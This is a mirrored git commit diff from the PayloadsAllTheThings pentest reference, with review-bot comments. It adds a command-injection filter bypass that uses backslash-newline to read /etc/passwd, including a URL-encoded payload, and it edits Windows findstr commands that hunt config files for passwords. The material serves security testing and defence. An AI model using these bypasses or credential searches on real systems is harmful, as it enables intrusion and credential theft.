mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Active Directory Federation Services
This commit is contained in:
commit
e5ea12a3ca
@ -12,6 +12,7 @@
|
|||||||
* [Filter Bypasses](#filter-bypasses)
|
* [Filter Bypasses](#filter-bypasses)
|
||||||
* [Bypass without space](#bypass-without-space)
|
* [Bypass without space](#bypass-without-space)
|
||||||
* [Bypass with a line return](#bypass-with-a-line-return)
|
* [Bypass with a line return](#bypass-with-a-line-return)
|
||||||
|
* [Bypass with backslash newline](#bypass-with-backslash-newline)
|
||||||
* [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding)
|
* [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding)
|
||||||
* [Bypass blacklisted words](#bypass-blacklisted-words)
|
* [Bypass blacklisted words](#bypass-blacklisted-words)
|
||||||
* [Bypass with single quote](#bypass-with-single-quote)
|
* [Bypass with single quote](#bypass-with-single-quote)
|
||||||
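Review bot: the new entry `* [Bypass with backslash newline](#bypass-with-backslash-newline)` needs a heading whose slug is exactly `bypass-with-backslash-newline`; the `### Bypass with backslash newline` heading added in the next hunk of this commit produces that slug, so the anchor resolves. Keep the same leading indentation as the neighbouring `* [Bypass ...]` lines so the nested list renders at the same level.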
@ -136,6 +137,25 @@ You can also write files.
|
|||||||
hello
|
hello
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Bypass with backslash newline
|
||||||
|
|
||||||
|
Commands can be broken into parts by using backslash followed by a newline
|
||||||
|
```powershell
|
||||||
|
❯ cat /et\
|
||||||
|
c/pa\
|
||||||
|
sswd
|
||||||
|
root:x:0:0:root:/root:/usr/bin/zsh
|
||||||
|
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||||
|
bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
||||||
|
sys:x:3:3:sys:/dev:/usr/sbin/nologin
|
||||||
|
sync:x:4:65534:sync:/bin:/bin/sync
|
||||||
|
[SNIP]
|
||||||
|
```
|
||||||
|
URL encoded form would look like this:
|
||||||
|
```powershell
|
||||||
|
cat%20/et%5C%0Ac/pa%5C%0Asswd
|
||||||
|
```
|
||||||
|
|
||||||
### Bypass characters filter via hex encoding
|
### Bypass characters filter via hex encoding
|
||||||
|
|
||||||
Linux
|
Linux
|
||||||
|
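Review bot: the fence is tagged `powershell` but wraps a Linux zsh session (the `❯` prompt and the `/etc/passwd` lines with `/usr/bin/zsh`), so the highlighting tag is misleading; tag it `bash` or `sh`. The prose should also say why the trick works: POSIX shells remove each `\` followed by a newline before word splitting, so `cat /et\<newline>c/pa\<newline>sswd` is tokenised as `cat /etc/passwd`, which is exactly why a filter comparing the raw input against the literal `/etc/passwd` never sees it. From a filtering standpoint the useful note for readers is that input should be normalised (backslash-newline pairs stripped, and `%5C%0A` decoded first, as the URL-encoded form `cat%20/et%5C%0Ac/pa%5C%0Asswd` shows) before any blacklist comparison; PowerShell does not treat `\<newline>` this way, which is a further reason not to label the block `powershell`.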
@ -226,7 +226,7 @@ Use the correct collector
|
|||||||
* AzureHound for Azure Active Directory
|
* AzureHound for Azure Active Directory
|
||||||
* SharpHound for local Active Directory
|
* SharpHound for local Active Directory
|
||||||
|
|
||||||
* use [AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](Cloud%20-%20Azure%20Pentest.md/#azure-recon-tools))
|
* use [AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md#azure-recon-tools))
|
||||||
|
|
||||||
* use [BloodHound](https://github.com/BloodHoundAD/BloodHound)
|
* use [BloodHound](https://github.com/BloodHoundAD/BloodHound)
|
||||||
```powershell
|
```powershell
|
||||||
|
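Review bot: the old link `Cloud%20-%20Azure%20Pentest.md/#azure-recon-tools` was broken only by the stray `/` before `#`; the replacement fixes that but switches to an absolute `https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/...` URL, which pins the branch name `master` and stops the link from following forks, mirrors and local checkouts. Since the target path shown in the new URL is `Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md`, a relative link to that file with the `/` removed (`...Pentest.md#azure-recon-tools`) would keep the anchor working without hardcoding the repository or branch.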
@ -449,7 +449,7 @@ Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry
|
|||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
|
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
|
||||||
findstr /si password *.xml *.ini *.txt *.config
|
findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt
|
||||||
findstr /spin "password" *.*
|
findstr /spin "password" *.*
|
||||||
```
|
```
|
||||||
|
|
||||||
|
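Review bot: `findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt` is the only one of the three commands that redirects, so the block mixes console output with a file write without saying so; either apply the same treatment to all three lines or add a comment explaining that `2>nul` drops the "Access denied" noise and `>>` appends to `results.txt` in the current directory. Worth stating too that writing `results.txt` leaves an artifact on disk that will itself match `*.txt` (and contain the word `password`) on any re-run, and that a broad recursive `findstr /si password` over `*.xml *.ini *.txt *.config` is a well-known credential-discovery pattern that endpoint telemetry on process command lines can flag, which is relevant for the readers on the defensive side of this page.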